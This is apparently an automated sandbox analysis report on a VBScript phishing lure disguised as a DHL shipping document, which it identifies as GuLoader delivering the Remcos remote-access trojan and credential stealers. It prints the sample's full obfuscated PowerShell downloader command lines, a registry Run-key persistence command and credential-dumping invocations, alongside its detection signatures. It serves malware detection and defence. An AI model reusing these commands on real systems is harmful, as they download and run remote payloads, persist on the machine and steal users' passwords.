
Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Overview

General Information

Sample name: DHL Shipping Document Awb & BL.vbs
Analysis ID: 1465419
MD5: af8e905368962cfb4873c41a77b4515c
SHA1: 577337de5d106e6b11225be7c362f33a8d5c0831
SHA256: bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
Tags: vbs

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7448 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd 
eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7712 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7792 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. 
dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighederne ' $Eg l oAbTaUli: BCa.nodTh.oUoFk =H$ tDr u eP ') ;Opdateringsprogrammet $Nourishments;Opdateringsprogrammet (Brandmyndighederne ' SBtFa,r tS-TS l.eSeUp 4L ');Opdateringsprogrammet (Brandmyndighederne ' $.gPl o,bMa,l,: A.s,p eTrAsii.oPn s,2,3 =H(ST eBsFtS-PPAa t hi H$RH,j lBp eVp rSsPtse rBs ), ') ;Opdateringsprogrammet (Brandmyndighederne 'E$OgCl o.b aLl.:AFPu,gFtUi gUh e,dMsHcFr eYmFeSrPnReP= $UgKl.oFbIaSlC:.MIiUd 
eArRnFe.sF+ + %,$.t iFl kVa,l dStIeP. cTo uSnAtO ') ;$Lancinated=$tilkaldte[$Fugtighedscremerne];}$Spidskandidaternes=331099;$Amphitoky=27737;Opdateringsprogrammet (Brandmyndighederne 'D$,g lPoFbSa l :DFMa,t,t i,gUfBiBn t O=. KGFe,tI-FCBo n.tAe.n t. ,$MHMjSl,pVeSpAr.s t.e.r.sD ');Opdateringsprogrammet (Brandmyndighederne 'A$ gSlRo b.aSl.:.O rUaBt o r iKcAaUlSlEyg T=G L[JSVy s tSeRmE.iC.o.nCv eHrAtF] :.:FF r o mIB a.s eP6O4 SFt r i,n g.( $ FIaht.t,iTgAf i.nTts)H ');Opdateringsprogrammet (Brandmyndighederne 'R$GgBl oTbta lJ:.RSu d yKaSrbdB =O F[PSCy.sFtVeEm,. T e.x.t . E n c,oAd,i nTg ].:,:LA,SBCUI,Im.EG ert S tYrSi,n,gu( $ O rAa tTo,r iLc a.lslMyD)e ');Opdateringsprogrammet (Brandmyndighederne 'F$Tg.l,oLbEa lZ:FB e sTt iBlSl e rF=.$,RTuRdHy a r,dF.Fs.u,bUs,tUrCi nNg,(D$.S p,i,d s,kFaMnPdei,dDa t e r nEe.sN,F$KAEm p h.iBt o.k,yE)T ');Opdateringsprogrammet $Bestiller;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 7884 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 1712 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • cmd.exe (PID: 6924 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 7284 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
          • wab.exe (PID: 1556 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 3492 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1792 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ycflhgp" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 604 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 2072 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iesdayaqqeg" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wab.exe (PID: 1832 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tyyoarljemyfhm" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
          • wscript.exe (PID: 3252 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Dropped files (Source; Rule; Description; Author):
Source: C:\Users\user\AppData\Roaming\kpburtts.dat; Rule: JoeSecurity_Remcos; Description: Yara detected Remcos RAT; Author: Joe Security

Memory dumps (Source; Rule; Description; Author; Strings):
Source: 00000005.00000002.1856054813.00000000090AD000.00000040.00001000.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: 0000000A.00000002.2247528936.0000000003BCD000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_GuLoader_2; Description: Yara detected GuLoader; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7548; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 7548; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
          • 0x16584a:$b2: ::FromBase64String(
          • 0x2c3604:$b2: ::FromBase64String(
          • 0x2c3640:$b2: ::FromBase64String(
          • 0x2c367d:$b2: ::FromBase64String(
          • 0x2c36bb:$b2: ::FromBase64String(
          • 0x2c36fa:$b2: ::FromBase64String(
          • 0x2c373a:$b2: ::FromBase64String(
          • 0x2c377b:$b2: ::FromBase64String(
          • 0x2c37bd:$b2: ::FromBase64String(
          • 0x2c3800:$b2: ::FromBase64String(
          • 0x2c3844:$b2: ::FromBase64String(
          • 0x2c3889:$b2: ::FromBase64String(
          • 0x2c38cf:$b2: ::FromBase64String(
          • 0x2c3916:$b2: ::FromBase64String(
          • 0x71e1f:$s1: -join
          • 0x76f86:$s1: -join
          • 0x98e04:$s1: -join
          • 0xa5ed9:$s1: -join
          • 0xa92ab:$s1: -join
          • 0xa995d:$s1: -join
          • 0xab44e:$s1: -join
Source: Process Memory Space: powershell.exe PID: 7792; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
AMSI scripts (Source; Rule; Description; Author; Strings):
Source: amsi64_7548.amsi.csv; Rule: JoeSecurity_PowershellDownloadAndExecute; Description: Yara detected Powershell download and execute; Author: Joe Security
Source: amsi32_7792.amsi.csv; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
              • 0xd9f7:$b2: ::FromBase64String(
              • 0xca6a:$s1: -join
              • 0x6216:$s4: +=
              • 0x62d8:$s4: +=
              • 0xa4ff:$s4: +=
              • 0xc61c:$s4: +=
              • 0xc906:$s4: +=
              • 0xca4c:$s4: +=
              • 0x16007:$s4: +=
              • 0x16087:$s4: +=
              • 0x1614d:$s4: +=
              • 0x161cd:$s4: +=
              • 0x163a3:$s4: +=
              • 0x16427:$s4: +=
              • 0xd299:$e4: Get-WmiObject
              • 0xd488:$e4: Get-Process
              • 0xd4e0:$e4: Start-Process
              • 0x16ca6:$e4: Get-Process

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , ProcessId: 3252, ProcessName: wscript.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\memvbbncbrxabktzvniruuteatm.vbs" , ProcessId: 3252, ProcessName: wscript.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", CommandLine|base64offset|contains: J), Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping Document Awb & BL.vbs", ProcessId: 7448, ProcessName: wscript.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 6924, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: %Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 7284, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\gstes
Source: Process started; Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community; Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6924, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", ProcessId: 7284, ProcessName: reg.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 $Kofta=(Get-ItemProperty -Path 'HKCU:\Fiberstof\').Ufuldkommenheds;%Udvalgenes215% ($Kofta)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 1712, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "gstes" /t REG_EXPAND_SZ /d "%Udvalgenes215% -w 1 